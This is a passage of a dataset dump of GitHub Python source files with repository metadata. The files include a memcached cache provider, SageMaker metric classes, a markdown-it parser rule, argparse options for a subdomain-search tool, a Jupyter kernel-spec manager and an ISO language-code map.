align=align)\n"},"size":{"kind":"number","value":1917,"string":"1,917"}}},{"rowIdx":886,"cells":{"max_stars_repo_path":{"kind":"string","value":"render/scene/SceneGnomon.py"},"max_stars_repo_name":{"kind":"string","value":"bvraghav/standible"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2024374"},"content":{"kind":"string","value":"import logging as lg\n\nfrom utils import Get, Set\n\nfrom . SceneDefault import SceneDefault\n\nfrom . Taxonomy import Taxonomy\nfrom . CameraGnomon import CameraGnomon\nfrom . Light import Light\nfrom . Gnomon import Gnomon\nfrom . Render import Render\n\nclass SceneGnomon(SceneDefault) :\n def setup(self) :\n lg.debug(\n 'Setting up scene from data: %s',\n Get.config('runtime/scene')\n )\n\n self.clear_scene()\n\n Taxonomy().setup()\n CameraGnomon.setup()\n Light.setup()\n Gnomon.setup()\n Render.setup()\n"},"size":{"kind":"number","value":523,"string":"523"}}},{"rowIdx":887,"cells":{"max_stars_repo_path":{"kind":"string","value":"src/sagemaker_algorithm_toolkit/metrics.py"},"max_stars_repo_name":{"kind":"string","value":"Chick-star/sagemaker-xgboost-container"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2024423"},"content":{"kind":"string","value":"# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the 'License'). You\n# may not use this file except in compliance with the License. A copy of\n# the License is located at\n#\n# http://aws.amazon.com/apache2.0/\n#\n# or in the 'license' file accompanying this file. This file is\n# distributed on an 'AS IS' BASIS, WITHOUT WARRANTIES OR CONDITIONS OF\n# ANY KIND, either express or implied. See the License for the specific\n# language governing permissions and limitations under the License.\nfrom sagemaker_algorithm_toolkit import exceptions as exc\n\nimport logging\n\n\nclass Metric(object):\n MAXIMIZE = \"Maximize\"\n MINIMIZE = \"Minimize\"\n\n def __init__(self, name, regex, format_string=None, tunable=True, direction=None):\n self.name = name\n self.format_string = format_string\n self.direction = direction\n self.regex = regex\n self.tunable = tunable\n if self.tunable and direction is None:\n raise exc.AlgorithmError(\"direction must be specified if tunable is True.\")\n\n def log(self, value):\n logging.info(self.format_string.format(value))\n\n def format_tunable(self):\n return {\"MetricName\": self.name,\n \"Type\": self.direction}\n\n def format_definition(self):\n return {\"Name\": self.name,\n \"Regex\": self.regex}\n\n\nclass Metrics(object):\n def __init__(self, *metrics):\n self.metrics = {metric.name: metric for metric in metrics}\n\n def __getitem__(self, name):\n return self.metrics[name]\n\n @property\n def names(self):\n return list(self.metrics)\n\n def format_tunable(self):\n metrics = []\n for name, metric in self.metrics.items():\n if metric.tunable:\n metrics.append(metric.format_tunable())\n return metrics\n\n def format_definitions(self):\n return [metric.format_definition() for name, metric in self.metrics.items()]\n"},"size":{"kind":"number","value":1995,"string":"1,995"}}},{"rowIdx":888,"cells":{"max_stars_repo_path":{"kind":"string","value":"markdown_it/rules_inline/text.py"},"max_stars_repo_name":{"kind":"string","value":"iooxa/markdown-it-py"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024502"},"content":{"kind":"string","value":"# Skip text characters for text 
token, place those to pending buffer\n# and increment current pos\n\nfrom .state_inline import StateInline\nfrom ..common.utils import charCodeAt\n\n\n# Rule to skip pure text\n# '{}$%@~+=:' reserved for extentions\n\n# !, \", #, $, %, &, ', (, ), *, +, ,, -, ., /, :, ;, <, =, >, ?, @, [, \\, ], ^, _, `, {, |, }, or ~\n\n# !!!! Don't confuse with \"Markdown ASCII Punctuation\" chars\n# http://spec.commonmark.org/0.15/#ascii-punctuation-character\ndef isTerminatorChar(ch):\n return ch in {\n 0x0A, # /* \\n */:\n 0x21, # /* ! */:\n 0x23, # /* # */:\n 0x24, # /* $ */:\n 0x25, # /* % */:\n 0x26, # /* & */:\n 0x2A, # /* * */:\n 0x2B, # /* + */:\n 0x2D, # /* - */:\n 0x3A, # /* : */:\n 0x3C, # /* < */:\n 0x3D, # /* = */:\n 0x3E, # /* > */:\n 0x40, # /* @ */:\n 0x5B, # /* [ */:\n 0x5C, # /* \\ */:\n 0x5D, # /* ] */:\n 0x5E, # /* ^ */:\n 0x5F, # /* _ */:\n 0x60, # /* ` */:\n 0x7B, # /* { */:\n 0x7D, # /* } */:\n 0x7E, # /* ~ */:\n }\n\n\ndef text(state: StateInline, silent: bool, **args):\n pos = state.pos\n\n while (pos < state.posMax) and not isTerminatorChar(charCodeAt(state.src, pos)):\n pos += 1\n\n if pos == state.pos:\n return False\n\n if not silent:\n state.pending += state.src[state.pos : pos]\n\n state.pos = pos\n\n return True\n"},"size":{"kind":"number","value":1449,"string":"1,449"}}},{"rowIdx":889,"cells":{"max_stars_repo_path":{"kind":"string","value":"pysimplecache/providers/memcached.py"},"max_stars_repo_name":{"kind":"string","value":"stajkowski/py-simple-cache"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024242"},"content":{"kind":"string","value":"import bmemcached\nimport os\nfrom pysimplecache.providers.base_provider import BaseProvider, \\\n UnhandledCachingException\n\n\nclass MemcachedProvider(BaseProvider):\n \"\"\" Memcached Provider \"\"\"\n\n def __init__(self, conversion, username=None, password=None,\n servers=None, enabled=True):\n \"\"\" Memcached Provider\n\n :param conversion: class for data conversion\n :param username: str memcached username\n :param password: str memcached password\n :param servers: str memcached servers (comma separated)\n :param enabled: bool if caching is enabled\n \"\"\"\n self.conversion = conversion\n self.cache_enabled = bool(os.getenv('MEMCACHEDCLOUD_ENABLED', enabled))\n self.cache_server = os.getenv('MEMCACHEDCLOUD_SERVERS', servers)\n self.cache_user = os.getenv('MEMCACHEDCLOUD_USERNAME', username)\n self.cache_pass = os.getenv('MEMCACHEDCLOUD_PASSWORD', password)\n self._client = self._setup_client()\n\n def _setup_client(self):\n \"\"\" Setup memcached client\n\n :return: obj memcached client\n \"\"\"\n if self.cache_enabled:\n try:\n if self.cache_user and self.cache_pass:\n return bmemcached.Client(\n self.cache_server.split(','),\n self.cache_user,\n self.cache_pass)\n else:\n return bmemcached.Client(\n self.cache_server.split(','))\n except Exception as e:\n raise UnhandledCachingException(\n 'UnhandledCachingException: {}'.format(str(e.message)))\n\n return None\n\n def get(self, key, ttl, method, **kwargs):\n \"\"\" Get cached data or call passed method\n\n :param key: str key value for cached data\n :param ttl: int ttl value for cached data\n :param method: obj method call for cache miss\n :param kwargs: parameters to pass into method\n :return: data, bool cache miss\n :raises: UnhandledCachingException\n \"\"\"\n if self._client:\n try:\n data = self._client.get(key)\n # if cache hit then return data decoded and if no\n # data present in cache, call method with passed\n # 
arguments and store in cache\n if data:\n return self.conversion.decode(data), False\n else:\n # if method is passed, load data and pass into\n # memcached with key\n if method is not None:\n data = method(**kwargs)\n self.put(key, ttl, data)\n return data, True\n else:\n return None, True\n except Exception as e:\n raise UnhandledCachingException(\n 'UnhandledCachingException: {}'.format(str(e.message)))\n finally:\n self._client.disconnect_all()\n\n def put(self, key, ttl, data):\n \"\"\" Put data into cache with passed ttl from referenced method\n\n :param key: str key value for cached data\n :param ttl: int ttl value for cached data\n :param data: data to pass into cache\n :return: None\n :raises: UnhandledCachingException\n \"\"\"\n if self._client:\n try:\n self._client.set(key, self.conversion.encode(data), ttl)\n except Exception as e:\n raise UnhandledCachingException(\n 'UnhandledCachingException: {}'.format(str(e.message)))\n finally:\n self._client.disconnect_all()\n\n def delete(self, key):\n \"\"\" Delete cached data with passed key\n\n :param key: str key value for cached data\n :return: None\n :raises: UnhandledCachingException\n \"\"\"\n if self._client:\n try:\n self._client.delete(key)\n except Exception as e:\n raise UnhandledCachingException(\n 'UnhandledCachingException: {}'.format(str(e.message)))\n finally:\n self._client.disconnect_all()\n"},"size":{"kind":"number","value":4247,"string":"4,247"}}},{"rowIdx":890,"cells":{"max_stars_repo_path":{"kind":"string","value":"subseeker_core/options.py"},"max_stars_repo_name":{"kind":"string","value":"DFC302/subseeker"},"max_stars_count":{"kind":"number","value":19,"string":"19"},"id":{"kind":"string","value":"2022820"},"content":{"kind":"string","value":"# This file contains information regarding command line arguments, title\n# information and version information.\n\nimport argparse\nimport sys\nfrom termcolor import colored\n\n# User options\ndef options():\n\tparser = argparse.ArgumentParser()\n\n\t# specify domain\n\tparser.add_argument(\n\t\t\"--domain\",\n\t\thelp=\"Specify domain to search.\",\n\t\taction=\"store\",\n\t)\n\n\t# single search mode\n\tparser.add_argument(\n\t\t\"--singlesearch\",\n\t\thelp=\"Search using a specific certificate site. Use --singlesearch options to list available search options.\",\n\t\taction=\"store\",\n\t\ttype=str,\n\t)\n\n\t# User can specify keywords instead of a file full of sub keywords\n\tparser.add_argument(\n\t\t\"--keywords\",\n\t\tnargs=\"+\",\n\t\thelp=\"Add a list of keywords.\",\n\t\ttype=str,\n\t)\n\n\t# Parse subdomain keywords from other tools output files\n\tparser.add_argument(\n\t\t\"--generate\",\n\t\thelp=\"Create a list of sub domain keywords from a file containing \\\n\t\tsubdomains.\",\n\t\taction=\"store_true\",\n\t)\n\n\t# search domain using subdomain keywords from file\n\tparser.add_argument(\n\t\t\"--file\",\n\t\thelp=\"Specify a file containing keywords to parse crt.sh OR to create \\\n\t\tsub keywords from.\",\n\t\taction=\"store\",\n\t)\n\n\t# Write to output file\n\tparser.add_argument(\n\t\t\"--out\",\n\t\thelp=\"Specify a file to write results too.\",\n\t\taction=\"store\",\n\t)\n\n\t# User specify number of threads\n\tparser.add_argument(\n\t\t\"--threads\",\n\t\thelp=\"Specify number of threads to be used when performing keyword \\\n\t\tsearch.\",\n\t\taction=\"store\",\n\t\ttype=int,\n\t)\n\n\t# Try with different headers, firefox, chrome, opera\n\tparser.add_argument(\n\t\t\"--useragent\",\n\t\thelp=\"Specify a user-agent to use. 
Default is a firefox UA.\",\n\t\taction=\"store\",\n\t\ttype=str\n\t)\n\n\t# If API information has been configured, allow use of API credentials\n\tparser.add_argument(\n\t\t\"--api\",\n\t\thelp=\"Turn on api.\",\n\t\taction=\"store_true\",\n\t)\n\n\t# Specify page number for certdb and/or censys\n\tparser.add_argument(\n\t\t\"--page\",\n\t\thelp=\"Used with certdb and/or censys searchmodes. Specify page number to display.\",\n\t\taction=\"store\",\n\t\ttype=int,\n\t)\n\n\tparser.add_argument(\n\t\t\"--version\",\n\t\thelp=\"Display version information\",\n\t\taction=\"store_true\",\n\t)\n\n\tparser.add_argument(\n\t\t\"--verbose\",\n\t\thelp=\"Display extra verbose information, such as errors.\",\n\t\taction=\"store_true\",\n\t)\n\n\t# if not arguments are given, print usage message\n\tif len(sys.argv[1:]) == 0:\n\t\tparser.print_help()\n\t\tparser.exit()\n\n\targs = parser.parse_args()\n\n\treturn args"},"size":{"kind":"number","value":2391,"string":"2,391"}}},{"rowIdx":891,"cells":{"max_stars_repo_path":{"kind":"string","value":"sdk/identity/azure-identity/tests/test_imds.py"},"max_stars_repo_name":{"kind":"string","value":"kushan2018/azure-sdk-for-python"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024566"},"content":{"kind":"string","value":"# ------------------------------------\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n# ------------------------------------\nfrom azure.identity._internal import ImdsCredential\n\n\ndef test_imds_credential():\n credential = ImdsCredential()\n token = credential.get_token(\"https://management.azure.com/.default\")\n assert token\n"},"size":{"kind":"number","value":358,"string":"358"}}},{"rowIdx":892,"cells":{"max_stars_repo_path":{"kind":"string","value":"String Conversion.py"},"max_stars_repo_name":{"kind":"string","value":"Darkhunter9/python"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2023205"},"content":{"kind":"string","value":"def steps_to_convert(line1,line2):\n def compare(line1,line2,i):\n tempdict = {}\n for j in range(len(line1)):\n if line1[j] in line2:\n try:\n tempdict[i+j] = line2.index(line1[j],max(tempdict.values()) if tempdict else 0)\n except Exception:\n continue\n return tempdict\n\n def calculate(line1,line2,similardict):\n result = 0\n temp3 = -1\n temp4 = -1\n while similardict:\n result += max(min(similardict.keys())-1-temp3,similardict[min(similardict.keys())]-temp4-1)\n temp3 = min(similardict.keys())\n temp4 = similardict[min(similardict.keys())]\n similardict.pop(min(similardict.keys()))\n result += max(len(line1)-temp3-1,len(line2)-temp4-1) \n return result\n\n result = None\n for i in range(len(line1)):\n tempdict = {}\n tempdict = compare(line1[i:],line2,i)\n if result == None:\n result = calculate(line1,line2,tempdict)\n else:\n result = min(result,calculate(line1,line2,tempdict))\n for i in range(len(line2)):\n tempdict = {}\n tempdict = compare(line2[i:],line1,i)\n if result == None:\n result = calculate(line2,line1,tempdict)\n else:\n result = min(result,calculate(line2,line1,tempdict))\n \n if result == None:\n return 0\n else:\n return result\n\n\nif __name__ == \"__main__\":\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert steps_to_convert('line1', 'line1') == 0, \"eq\"\n assert steps_to_convert('line1', 'line2') == 1, \"2\"\n assert steps_to_convert('line', 'line2') == 1, \"none to 2\"\n assert steps_to_convert('ine', 'line2') == 2, \"need 
two more\"\n assert steps_to_convert('line1', '1enil') == 4, \"everything is opposite\"\n assert steps_to_convert('', '') == 0, \"two empty\"\n assert steps_to_convert('l', '') == 1, \"one side\"\n assert steps_to_convert('', 'l') == 1, \"another side\"\n print(\"You are good to go!\")\n"},"size":{"kind":"number","value":2088,"string":"2,088"}}},{"rowIdx":893,"cells":{"max_stars_repo_path":{"kind":"string","value":"tests/test_io.py"},"max_stars_repo_name":{"kind":"string","value":"sandralorenz268/hylite"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2023268"},"content":{"kind":"string","value":"import unittest\nimport os\nfrom hylite import io\nfrom pathlib import Path\nfrom tempfile import mkdtemp\nimport shutil\n\nclass TestHyImage(unittest.TestCase):\n def test_load(self):\n self.img = io.load(os.path.join(str(Path(__file__).parent.parent), \"test_data/image.hdr\"))\n self.lib = io.load(os.path.join(str(Path(__file__).parent.parent), \"test_data/library.csv\"))\n self.cld = io.load(os.path.join(str(Path(__file__).parent.parent), \"test_data/hypercloud.hdr\"))\n\n def test_save(self):\n self.test_load() # load datasets\n for data in [self.img, self.lib, self.cld]:\n pth = mkdtemp()\n try:\n io.save(os.path.join(pth, \"data.hdr\"), data )\n shutil.rmtree(pth) # delete temp directory\n except:\n shutil.rmtree(pth) # delete temp directory\n self.assertFalse(True, \"Error - could not save data of type %s\" % str(type(data)))\n\nif __name__ == '__main__':\n unittest.main()"},"size":{"kind":"number","value":995,"string":"995"}}},{"rowIdx":894,"cells":{"max_stars_repo_path":{"kind":"string","value":"swap-random.py"},"max_stars_repo_name":{"kind":"string","value":"jonspeicher/blinkyfun"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2023835"},"content":{"kind":"string","value":"#!/usr/bin/env python\n\nfrom blinkytape import tape, player\nfrom patterns import random\nfrom animations import swap\nimport sys\n\ntape = tape.BlinkyTape.find_first()\n\npattern = random.Random(tape.pixel_count)\n\nframe_period_sec = float(sys.argv[1])\nanimation = swap.Swap(pattern, frame_period_sec)\n\nplayer = player.Player(tape)\nplayer.play_animation(animation, player.FOREVER)\n"},"size":{"kind":"number","value":373,"string":"373"}}},{"rowIdx":895,"cells":{"max_stars_repo_path":{"kind":"string","value":"environment_kernels/core.py"},"max_stars_repo_name":{"kind":"string","value":"Cadair/jupyter_conda_kernels"},"max_stars_count":{"kind":"number","value":150,"string":"150"},"id":{"kind":"string","value":"2024180"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\n\nimport os\nimport os.path\n\nfrom jupyter_client.kernelspec import (KernelSpecManager, NoSuchKernel)\nfrom traitlets import List, Unicode, Bool, Int\n\nfrom .envs_conda import get_conda_env_data\nfrom .envs_virtualenv import get_virtualenv_env_data\nfrom .utils import FileNotFoundError, HAVE_CONDA\n\nENV_SUPPLYER = [get_conda_env_data, get_virtualenv_env_data]\n\n__all__ = ['EnvironmentKernelSpecManager']\n\n\nclass EnvironmentKernelSpecManager(KernelSpecManager):\n \"\"\"\n A Jupyter Kernel manager which dyamically checks for Environments\n\n Given a list of base directories, this class searches for the pattern::\n\n BASE_DIR/NAME/{bin|Skript}/ipython\n\n where NAME is taken to be the name of the environment.\n \"\"\"\n\n # Take the default home DIR for conda and virtualenv as the default\n _default_conda_dirs = 
['~/.conda/envs/']\n _default_virtualenv_dirs = ['~/.virtualenvs']\n\n # Check for the CONDA_ENV_PATH variable and add it to the list if set.\n if os.environ.get('CONDA_ENV_PATH', False):\n _default_conda_dirs.append(os.environ['CONDA_ENV_PATH'].split('envs')[0])\n\n # If we are running inside the root conda env can get all the env dirs:\n if HAVE_CONDA:\n import conda\n _default_conda_dirs += conda.config.envs_dirs\n\n # Remove any duplicates\n _default_conda_dirs = list(set(map(os.path.expanduser,\n _default_conda_dirs)))\n\n conda_env_dirs = List(\n _default_conda_dirs,\n config=True,\n help=\"List of directories in which are conda environments.\")\n\n virtualenv_env_dirs = List(\n _default_virtualenv_dirs,\n config=True,\n help=\"List of directories in which are virtualenv environments.\")\n\n blacklist_envs = List(\n [\"conda__build\"],\n config=True,\n help=\"Environments which should not be used even if a ipykernel exists in it.\")\n\n whitelist_envs = List(\n [],\n config=True,\n help=\"Environments which should be used, all others are ignored (overwrites blacklist_envs).\")\n\n display_name_template = Unicode(\n u\"Environment ({})\",\n config=True,\n help=\"Template for the kernel name in the UI. Needs to include {} for the name.\")\n\n conda_prefix_template = Unicode(\n u\"conda_{}\",\n config=True,\n help=\"Template for the conda environment kernel name prefix in the UI. Needs to include {} for the name.\")\n\n virtualenv_prefix_template = Unicode(\n u\"virtualenv_{}\",\n config=True,\n help=\"Template for the virtualenv environment kernel name prefix in the UI. Needs to include {} for the name.\")\n\n find_conda_envs = Bool(\n True,\n config=True,\n help=\"Probe for conda environments, including calling conda itself.\")\n\n find_r_envs = Bool(\n True,\n config=True,\n help=\"Probe environments for R kernels (currently only conda environments).\")\n\n use_conda_directly = Bool(\n True,\n config=True,\n help=\"Probe for conda environments by calling conda itself. Only relevant if find_conda_envs is True.\")\n\n refresh_interval = Int(\n 3,\n config=True,\n help=\"Interval (in minutes) to refresh the list of environment kernels. Setting it to '0' disables the refresh.\")\n\n find_virtualenv_envs = Bool(True,\n config=True,\n help=\"Probe for virtualenv environments.\")\n\n def __init__(self, *args, **kwargs):\n super(EnvironmentKernelSpecManager, self).__init__(*args, **kwargs)\n self.log.info(\"Using EnvironmentKernelSpecManager...\")\n self._env_data_cache = {}\n if self.refresh_interval > 0:\n try:\n from tornado.ioloop import PeriodicCallback, IOLoop\n # Initial loading NOW\n IOLoop.current().call_later(0, callback=self._update_env_data, initial=True)\n # Later updates\n updater = PeriodicCallback(callback=self._update_env_data,\n callback_time=1000 * 60 * self.refresh_interval)\n updater.start()\n if not updater.is_running():\n raise Exception()\n self._periodic_updater = updater\n self.log.info(\"Started periodic updates of the kernel list (every %s minutes).\", self.refresh_interval)\n except:\n self.log.exception(\"Error while trying to enable periodic updates of the kernel list.\")\n else:\n self.log.info(\"Periodical updates the kernel list are DISABLED.\")\n\n def validate_env(self, envname):\n \"\"\"\n Check the name of the environment against the black list and the\n whitelist. 
If a whitelist is specified only it is checked.\n \"\"\"\n if self.whitelist_envs and envname in self.whitelist_envs:\n return True\n elif self.whitelist_envs:\n return False\n\n if self.blacklist_envs and envname not in self.blacklist_envs:\n return True\n elif self.blacklist_envs:\n # If there is just a True, all envs are blacklisted\n return False\n else:\n return True\n\n def _update_env_data(self, initial=False):\n if initial:\n self.log.info(\"Starting initial scan of virtual environments...\")\n else:\n self.log.debug(\"Starting periodic scan of virtual environments...\")\n self._get_env_data(reload=True)\n self.log.debug(\"done.\")\n\n def _get_env_data(self, reload=False):\n \"\"\"Get the data about the available environments.\n\n env_data is a structure {name -> (resourcedir, kernel spec)}\n \"\"\"\n\n # This is called much too often and finding-process is really expensive :-(\n if not reload and getattr(self, \"_env_data_cache\", {}):\n return getattr(self, \"_env_data_cache\")\n\n env_data = {}\n for supplyer in ENV_SUPPLYER:\n env_data.update(supplyer(self))\n\n env_data = {name: env_data[name] for name in env_data if self.validate_env(name)}\n new_kernels = [env for env in list(env_data.keys()) if env not in list(self._env_data_cache.keys())]\n if new_kernels:\n self.log.info(\"Found new kernels in environments: %s\", \", \".join(new_kernels))\n\n self._env_data_cache = env_data\n return env_data\n\n def find_kernel_specs_for_envs(self):\n \"\"\"Returns a dict mapping kernel names to resource directories.\"\"\"\n data = self._get_env_data()\n return {name: data[name][0] for name in data}\n\n def get_all_kernel_specs_for_envs(self):\n \"\"\"Returns the dict of name -> kernel_spec for all environments\"\"\"\n\n data = self._get_env_data()\n return {name: data[name][1] for name in data}\n\n def find_kernel_specs(self):\n \"\"\"Returns a dict mapping kernel names to resource directories.\"\"\"\n # let real installed kernels overwrite envs with the same name:\n # this is the same order as the get_kernel_spec way, which also prefers\n # kernels from the jupyter dir over env kernels.\n specs = self.find_kernel_specs_for_envs()\n specs.update(super(EnvironmentKernelSpecManager,\n self).find_kernel_specs())\n return specs\n\n def get_all_specs(self):\n \"\"\"Returns a dict mapping kernel names and resource directories.\n \"\"\"\n # This is new in 4.1 -> https://github.com/jupyter/jupyter_client/pull/93\n specs = self.get_all_kernel_specs_for_envs()\n specs.update(super(EnvironmentKernelSpecManager, self).get_all_specs())\n return specs\n\n def get_kernel_spec(self, kernel_name):\n \"\"\"Returns a :class:`KernelSpec` instance for the given kernel_name.\n\n Raises :exc:`NoSuchKernel` if the given kernel name is not found.\n \"\"\"\n try:\n return super(EnvironmentKernelSpecManager,\n self).get_kernel_spec(kernel_name)\n except (NoSuchKernel, FileNotFoundError):\n venv_kernel_name = kernel_name.lower()\n specs = self.get_all_kernel_specs_for_envs()\n if venv_kernel_name in specs:\n return specs[venv_kernel_name]\n else:\n raise NoSuchKernel(kernel_name)\n"},"size":{"kind":"number","value":8388,"string":"8,388"}}},{"rowIdx":896,"cells":{"max_stars_repo_path":{"kind":"string","value":"geoometa/schema/references.py"},"max_stars_repo_name":{"kind":"string","value":"deniskolokol/geoo-meta"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024369"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n\n\"\"\"Reference data used in index 
creation.\"\"\"\n\n# Lang mapping to ISO 639-1 (from ISO 639-2 or anyting else)\n# for all commonly known languaes.\n# Source: https://en.wikipedia.org/wiki/List_of_ISO_639-1_codes\nLANG_MAP = {\n \"aar\": \"aa\",\n \"abk\": \"ab\",\n \"ave\": \"ae\",\n \"afr\": \"af\",\n \"aka\": \"ak\",\n \"amh\": \"am\",\n \"arg\": \"an\",\n \"ara\": \"ar\",\n \"asm\": \"as\",\n \"ava\": \"av\",\n \"aym\": \"ay\",\n \"aze\": \"az\",\n \"bak\": \"ba\",\n \"bel\": \"be\",\n \"bul\": \"bg\",\n \"bih\": \"bh\",\n \"bis\": \"bi\",\n \"bam\": \"bm\",\n \"ben\": \"bn\",\n \"bod\": \"bo\",\n \"tib\": \"bo\",\n \"bre\": \"br\",\n \"bos\": \"bs\",\n \"cat\": \"ca\",\n \"che\": \"ce\",\n \"cha\": \"ch\",\n \"cos\": \"co\",\n \"cre\": \"cr\",\n \"ces\": \"cs\",\n \"cze\": \"cs\",\n \"chu\": \"cu\",\n \"chv\": \"cv\",\n \"cym\": \"cy\",\n \"wel\": \"cy\",\n \"dan\": \"da\",\n \"deu\": \"de\",\n \"ger\": \"de\",\n \"div\": \"dv\",\n \"dzo\": \"dz\",\n \"ewe\": \"ee\",\n \"ell\": \"el\",\n \"gre\": \"el\",\n \"eng\": \"en\",\n \"epo\": \"eo\",\n \"spa\": \"es\",\n \"est\": \"et\",\n \"eus\": \"eu\",\n \"baq\": \"eu\",\n \"fas\": \"fa\",\n \"per\": \"fa\",\n \"ful\": \"ff\",\n \"fin\": \"fi\",\n \"fij\": \"fj\",\n \"fao\": \"fo\",\n \"fra\": \"fr\",\n \"fre\": \"fr\",\n \"fry\": \"fy\",\n \"gle\": \"ga\",\n \"gla\": \"gd\",\n \"glg\": \"gl\",\n \"grn\": \"gn\",\n \"guj\": \"gu\",\n \"glv\": \"gv\",\n \"hau\": \"ha\",\n \"heb\": \"he\",\n \"hin\": \"hi\",\n \"hmo\": \"ho\",\n \"hrv\": \"hr\",\n \"hat\": \"ht\",\n \"hun\": \"hu\",\n \"hye\": \"hy\",\n \"arm\": \"hy\",\n \"her\": \"hz\",\n \"ina\": \"ia\",\n \"ind\": \"id\",\n \"ile\": \"ie\",\n \"ibo\": \"ig\",\n \"iii\": \"ii\",\n \"ipk\": \"ik\",\n \"ido\": \"io\",\n \"isl\": \"is\",\n \"ice\": \"is\",\n \"ita\": \"it\",\n \"itl\": \"it\",\n \"iku\": \"iu\",\n \"jpn\": \"ja\",\n \"jav\": \"jv\",\n \"kat\": \"ka\",\n \"geo\": \"ka\",\n \"kon\": \"kg\",\n \"kik\": \"ki\",\n \"kua\": \"kj\",\n \"kaz\": \"kk\",\n \"kal\": \"kl\",\n \"khm\": \"km\",\n \"kan\": \"kn\",\n \"kor\": \"ko\",\n \"kau\": \"kr\",\n \"kas\": \"ks\",\n \"kur\": \"ku\",\n \"kom\": \"kv\",\n \"cor\": \"kw\",\n \"kir\": \"ky\",\n \"lat\": \"la\",\n \"ltz\": \"lb\",\n \"lug\": \"lg\",\n \"lim\": \"li\",\n \"lin\": \"ln\",\n \"lao\": \"lo\",\n \"lit\": \"lt\",\n \"lub\": \"lu\",\n \"lav\": \"lv\",\n \"mlg\": \"mg\",\n \"mah\": \"mh\",\n \"mri\": \"mi\",\n \"mao\": \"mi\",\n \"mkd\": \"mk\",\n \"mac\": \"mk\",\n \"mal\": \"ml\",\n \"mon\": \"mn\",\n \"mar\": \"mr\",\n \"msa\": \"ms\",\n \"may\": \"ms\",\n \"mlt\": \"mt\",\n \"mya\": \"my\",\n \"bur\": \"my\",\n \"nau\": \"na\",\n \"nob\": \"nb\",\n \"nde\": \"nd\",\n \"nep\": \"ne\",\n \"ndo\": \"ng\",\n \"nld\": \"nl\",\n \"dut\": \"nl\",\n \"nno\": \"nn\",\n \"nor\": \"no\",\n \"nbl\": \"nr\",\n \"nav\": \"nv\",\n \"nya\": \"ny\",\n \"oci\": \"oc\",\n \"oji\": \"oj\",\n \"orm\": \"om\",\n \"ori\": \"or\",\n \"oss\": \"os\",\n \"pan\": \"pa\",\n \"pli\": \"pi\",\n \"pol\": \"pl\",\n \"pus\": \"ps\",\n \"por\": \"pt\",\n \"que\": \"qu\",\n \"roh\": \"rm\",\n \"run\": \"rn\",\n \"ron\": \"ro\",\n \"rum\": \"ro\",\n \"rus\": \"ru\",\n \"kin\": \"rw\",\n \"san\": \"sa\",\n \"srd\": \"sc\",\n \"snd\": \"sd\",\n \"sme\": \"se\",\n \"sag\": \"sg\",\n \"sin\": \"si\",\n \"slk\": \"sk\",\n \"slo\": \"sk\",\n \"slv\": \"sl\",\n \"smo\": \"sm\",\n \"sna\": \"sn\",\n \"som\": \"so\",\n \"sqi\": \"sq\",\n \"alb\": \"sq\",\n \"srp\": \"sr\",\n \"ssw\": \"ss\",\n \"sot\": \"st\",\n \"sun\": \"su\",\n \"swe\": \"sv\",\n \"swa\": \"sw\",\n \"tam\": \"ta\",\n \"tel\": 
\"te\",\n \"tgk\": \"tg\",\n \"tha\": \"th\",\n \"tir\": \"ti\",\n \"tuk\": \"tk\",\n \"tgl\": \"tl\",\n \"tsn\": \"tn\",\n \"ton\": \"to\",\n \"tur\": \"tr\",\n \"tso\": \"ts\",\n \"tat\": \"tt\",\n \"twi\": \"tw\",\n \"tah\": \"ty\",\n \"uig\": \"ug\",\n \"ukr\": \"uk\",\n \"urd\": \"ur\",\n \"uzb\": \"uz\",\n \"ven\": \"ve\",\n \"vie\": \"vi\",\n \"vol\": \"vo\",\n \"wln\": \"wa\",\n \"wol\": \"wo\",\n \"xho\": \"xh\",\n \"yid\": \"yi\",\n \"yor\": \"yo\",\n \"zha\": \"za\",\n \"zho\": \"zh\",\n \"chi\": \"zh\",\n \"zul\": \"zu\"\n }\n\n\n# Language fields by ISO 639-1 codes.\nLANG_FIELDS = {\n \"en\": {\"type\": \"text\", \"analyzer\": \"english\"},\n \"cz\": {\"type\": \"text\", \"analyzer\": \"czech\"},\n \"gr\": {\"type\": \"text\", \"analyzer\": \"greek\"},\n \"es\": {\"type\": \"text\", \"analyzer\": \"spanish\"},\n \"fi\": {\"type\": \"text\", \"analyzer\": \"finnish\"},\n \"it\": {\"type\": \"text\", \"analyzer\": \"italian\"},\n \"lv\": {\"type\": \"text\", \"analyzer\": \"latvian\"},\n \"ar\": {\"type\": \"text\", \"analyzer\": \"arabic\"},\n \"hy\": {\"type\": \"text\", \"analyzer\": \"armenian\"},\n \"eu\": {\"type\": \"text\", \"analyzer\": \"basque\"},\n \"bn\": {\"type\": \"text\", \"analyzer\": \"bengali\"},\n \"bg\": {\"type\": \"text\", \"analyzer\": \"bulgarian\"},\n \"ca\": {\"type\": \"text\", \"analyzer\": \"catalan\"},\n \"nl\": {\"type\": \"text\", \"analyzer\": \"dutch\"},\n \"fr\": {\"type\": \"text\", \"analyzer\": \"french\"},\n \"gl\": {\"type\": \"text\", \"analyzer\": \"galician\"},\n \"de\": {\"type\": \"text\", \"analyzer\": \"german\"},\n \"hi\": {\"type\": \"text\", \"analyzer\": \"hindi\"},\n \"hu\": {\"type\": \"text\", \"analyzer\": \"hungarian\"},\n \"id\": {\"type\": \"text\", \"analyzer\": \"indonesian\"},\n \"ga\": {\"type\": \"text\", \"analyzer\": \"irish\"},\n \"lt\": {\"type\": \"text\", \"analyzer\": \"lithuanian\"},\n \"nb\": {\"type\": \"text\", 